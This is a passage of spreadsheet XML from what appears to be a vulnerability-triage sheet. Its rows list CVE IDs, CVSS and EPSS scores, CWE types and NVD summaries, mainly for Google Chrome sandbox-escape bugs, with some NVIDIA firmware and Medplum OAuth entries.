      <c r="I318" s="5" t="inlineStr"/>
      <c r="J318" s="5" t="inlineStr"/>
      <c r="K318" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L318" s="5" t="inlineStr"/>
      <c r="M318" s="5" t="inlineStr"/>
      <c r="N318" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O318" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P318" s="5" t="inlineStr"/>
      <c r="Q318" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R318" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in FileAPI in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87510</t>
        </is>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B319" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87524</t>
        </is>
      </c>
      <c r="D319" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E319" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F319" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G319" s="5" t="inlineStr"/>
      <c r="H319" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I319" s="5" t="inlineStr"/>
      <c r="J319" s="5" t="inlineStr"/>
      <c r="K319" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L319" s="5" t="inlineStr"/>
      <c r="M319" s="5" t="inlineStr"/>
      <c r="N319" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O319" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P319" s="5" t="inlineStr"/>
      <c r="Q319" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R319" s="5" t="inlineStr">
        <is>
          <t>Use after free in Core in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87524</t>
        </is>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B320" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87553</t>
        </is>
      </c>
      <c r="D320" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E320" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F320" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G320" s="5" t="inlineStr"/>
      <c r="H320" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I320" s="5" t="inlineStr"/>
      <c r="J320" s="5" t="inlineStr"/>
      <c r="K320" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L320" s="5" t="inlineStr"/>
      <c r="M320" s="5" t="inlineStr"/>
      <c r="N320" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O320" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P320" s="5" t="inlineStr"/>
      <c r="Q320" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R320" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in SiteIsolation in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87553</t>
        </is>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B321" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87572</t>
        </is>
      </c>
      <c r="D321" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E321" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F321" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G321" s="5" t="inlineStr"/>
      <c r="H321" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I321" s="5" t="inlineStr"/>
      <c r="J321" s="5" t="inlineStr"/>
      <c r="K321" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L321" s="5" t="inlineStr"/>
      <c r="M321" s="5" t="inlineStr"/>
      <c r="N321" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O321" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P321" s="5" t="inlineStr"/>
      <c r="Q321" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="R321" s="5" t="inlineStr">
        <is>
          <t>Injection in DevTools in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87572</t>
        </is>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B322" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87578</t>
        </is>
      </c>
      <c r="D322" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E322" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F322" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G322" s="5" t="inlineStr"/>
      <c r="H322" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I322" s="5" t="inlineStr"/>
      <c r="J322" s="5" t="inlineStr"/>
      <c r="K322" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L322" s="5" t="inlineStr"/>
      <c r="M322" s="5" t="inlineStr"/>
      <c r="N322" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O322" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P322" s="5" t="inlineStr"/>
      <c r="Q322" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R322" s="5" t="inlineStr">
        <is>
          <t>Use after free in Receiver in Google Chrome prior to 153.0.8010.36 allowed an adjacent attacker to execute arbitrary code outside the sandbox via crafted network traffic. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87578</t>
        </is>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B323" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87582</t>
        </is>
      </c>
      <c r="D323" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E323" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F323" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G323" s="5" t="inlineStr"/>
      <c r="H323" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I323" s="5" t="inlineStr"/>
      <c r="J323" s="5" t="inlineStr"/>
      <c r="K323" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L323" s="5" t="inlineStr"/>
      <c r="M323" s="5" t="inlineStr"/>
      <c r="N323" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O323" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P323" s="5" t="inlineStr"/>
      <c r="Q323" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="R323" s="5" t="inlineStr">
        <is>
          <t>Confused deputy in DataTransfer in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87582</t>
        </is>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B324" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87604</t>
        </is>
      </c>
      <c r="D324" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E324" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F324" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G324" s="5" t="inlineStr"/>
      <c r="H324" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I324" s="5" t="inlineStr"/>
      <c r="J324" s="5" t="inlineStr"/>
      <c r="K324" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L324" s="5" t="inlineStr"/>
      <c r="M324" s="5" t="inlineStr"/>
      <c r="N324" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O324" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P324" s="5" t="inlineStr"/>
      <c r="Q324" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R324" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in ANGLE in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87604</t>
        </is>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B325" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87616</t>
        </is>
      </c>
      <c r="D325" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E325" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F325" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G325" s="5" t="inlineStr"/>
      <c r="H325" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I325" s="5" t="inlineStr"/>
      <c r="J325" s="5" t="inlineStr"/>
      <c r="K325" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L325" s="5" t="inlineStr"/>
      <c r="M325" s="5" t="inlineStr"/>
      <c r="N325" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O325" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P325" s="5" t="inlineStr"/>
      <c r="Q325" s="5" t="inlineStr">
        <is>
          <t>CWE-665</t>
        </is>
      </c>
      <c r="R325" s="5" t="inlineStr">
        <is>
          <t>Improper initialization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S325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87616</t>
        </is>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B326" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87618</t>
        </is>
      </c>
      <c r="D326" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E326" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F326" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G326" s="5" t="inlineStr"/>
      <c r="H326" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I326" s="5" t="inlineStr"/>
      <c r="J326" s="5" t="inlineStr"/>
      <c r="K326" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L326" s="5" t="inlineStr"/>
      <c r="M326" s="5" t="inlineStr"/>
      <c r="N326" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O326" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P326" s="5" t="inlineStr"/>
      <c r="Q326" s="5" t="inlineStr">
        <is>
          <t>CWE-706</t>
        </is>
      </c>
      <c r="R326" s="5" t="inlineStr">
        <is>
          <t>Incorrect reference resolution in Storage in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87618</t>
        </is>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B327" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87628</t>
        </is>
      </c>
      <c r="D327" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E327" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F327" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G327" s="5" t="inlineStr"/>
      <c r="H327" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I327" s="5" t="inlineStr"/>
      <c r="J327" s="5" t="inlineStr"/>
      <c r="K327" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L327" s="5" t="inlineStr"/>
      <c r="M327" s="5" t="inlineStr"/>
      <c r="N327" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O327" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P327" s="5" t="inlineStr"/>
      <c r="Q327" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R327" s="5" t="inlineStr">
        <is>
          <t>Use after free in Cast in Google Chrome prior to 153.0.8010.36 allowed an adjacent attacker to potentially execute arbitrary code outside the sandbox via crafted network traffic. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="S327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87628</t>
        </is>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B328" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87639</t>
        </is>
      </c>
      <c r="D328" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E328" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F328" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G328" s="5" t="inlineStr"/>
      <c r="H328" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I328" s="5" t="inlineStr"/>
      <c r="J328" s="5" t="inlineStr"/>
      <c r="K328" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L328" s="5" t="inlineStr"/>
      <c r="M328" s="5" t="inlineStr"/>
      <c r="N328" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O328" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P328" s="5" t="inlineStr"/>
      <c r="Q328" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R328" s="5" t="inlineStr">
        <is>
          <t>Use after free in WebPackaging in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87639</t>
        </is>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B329" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87644</t>
        </is>
      </c>
      <c r="D329" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E329" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F329" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G329" s="5" t="inlineStr"/>
      <c r="H329" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I329" s="5" t="inlineStr"/>
      <c r="J329" s="5" t="inlineStr"/>
      <c r="K329" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L329" s="5" t="inlineStr"/>
      <c r="M329" s="5" t="inlineStr"/>
      <c r="N329" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O329" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P329" s="5" t="inlineStr"/>
      <c r="Q329" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R329" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization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S329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87644</t>
        </is>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B330" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87648</t>
        </is>
      </c>
      <c r="D330" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E330" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F330" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G330" s="5" t="inlineStr"/>
      <c r="H330" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I330" s="5" t="inlineStr"/>
      <c r="J330" s="5" t="inlineStr"/>
      <c r="K330" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L330" s="5" t="inlineStr"/>
      <c r="M330" s="5" t="inlineStr"/>
      <c r="N330" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O330" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P330" s="5" t="inlineStr"/>
      <c r="Q330" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R330" s="5" t="inlineStr">
        <is>
          <t>Use after free in ANGLE in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87648</t>
        </is>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B331" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12855</t>
        </is>
      </c>
      <c r="D331" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E331" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F331" s="5" t="inlineStr">
        <is>
          <t>8338d8cb-57f7-4252-abc0-96fd13e98d21</t>
        </is>
      </c>
      <c r="G331" s="5" t="inlineStr"/>
      <c r="H331" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I331" s="5" t="inlineStr"/>
      <c r="J331" s="5" t="inlineStr"/>
      <c r="K331" s="5" t="inlineStr"/>
      <c r="L331" s="5" t="inlineStr"/>
      <c r="M331" s="5" t="inlineStr"/>
      <c r="N331" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O331" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P331" s="5" t="inlineStr"/>
      <c r="Q331" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R331" s="5" t="inlineStr">
        <is>
          <t>Unvalidated memory boundary could result in arbitrary code execution. The vulnerability exists in the code developed specifically for HP projects.</t>
        </is>
      </c>
      <c r="S331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12855</t>
        </is>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B332" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24262</t>
        </is>
      </c>
      <c r="D332" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E332" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F332" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G332" s="5" t="inlineStr"/>
      <c r="H332" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I332" s="5" t="inlineStr"/>
      <c r="J332" s="5" t="inlineStr"/>
      <c r="K332" s="5" t="inlineStr">
        <is>
          <t>nvidia:dgx_spark, nvidia:dgx_spark_uefi</t>
        </is>
      </c>
      <c r="L332" s="5" t="inlineStr"/>
      <c r="M332" s="5" t="inlineStr"/>
      <c r="N332" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O332" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P332" s="5" t="inlineStr"/>
      <c r="Q332" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R332" s="5" t="inlineStr">
        <is>
          <t>NVIDIA DGX Spark contains a vulnerability in the system firmware, where a privileged attacker could be able to cause an out-of-bounds write. A successful exploit of this vulnerability may lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="S332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24262</t>
        </is>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B333" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24263</t>
        </is>
      </c>
      <c r="D333" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E333" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F333" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G333" s="5" t="inlineStr"/>
      <c r="H333" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I333" s="5" t="inlineStr"/>
      <c r="J333" s="5" t="inlineStr"/>
      <c r="K333" s="5" t="inlineStr">
        <is>
          <t>nvidia:dgx_spark, nvidia:dgx_spark_uefi</t>
        </is>
      </c>
      <c r="L333" s="5" t="inlineStr"/>
      <c r="M333" s="5" t="inlineStr"/>
      <c r="N333" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O333" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P333" s="5" t="inlineStr"/>
      <c r="Q333" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R333" s="5" t="inlineStr">
        <is>
          <t>NVIDIA DGX Spark contains a vulnerability in the system firmware, where a privileged attacker could be able to cause a NULL pointer dereference. A successful exploit of this vulnerability may lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="S333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24263</t>
        </is>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B334" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44506</t>
        </is>
      </c>
      <c r="D334" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E334" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F334" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G334" s="5" t="inlineStr"/>
      <c r="H334" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I334" s="5" t="inlineStr"/>
      <c r="J334" s="5" t="inlineStr"/>
      <c r="K334" s="5" t="inlineStr"/>
      <c r="L334" s="5" t="inlineStr"/>
      <c r="M334" s="5" t="inlineStr"/>
      <c r="N334" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O334" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P334" s="5" t="inlineStr"/>
      <c r="Q334" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R334" s="5" t="inlineStr">
        <is>
          <t>Medplum is a developer platform that enables development of healthcare apps. In Medplum versions 4.1.10 through 5.1.6, the /oauth2/register endpoint could return the client_secret of preconfigured OAuth clients defined via the defaultOAuthClients server configuration when a matching redirect_uri was provided. This issue has been patched in version 5.1.7.</t>
        </is>
      </c>
      <c r="S334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44506</t>
        </is>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B335" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47626</t>
        </is>
      </c>
      <c r="D335" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E335" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F335" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G335" s="5" t="inlineStr"/>
      <c r="H335" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I335" s="5" t="inlineStr"/>
      <c r="J335" s="5" t="inlineStr"/>
      <c r="K335" s="5" t="inlineStr">
        <is>
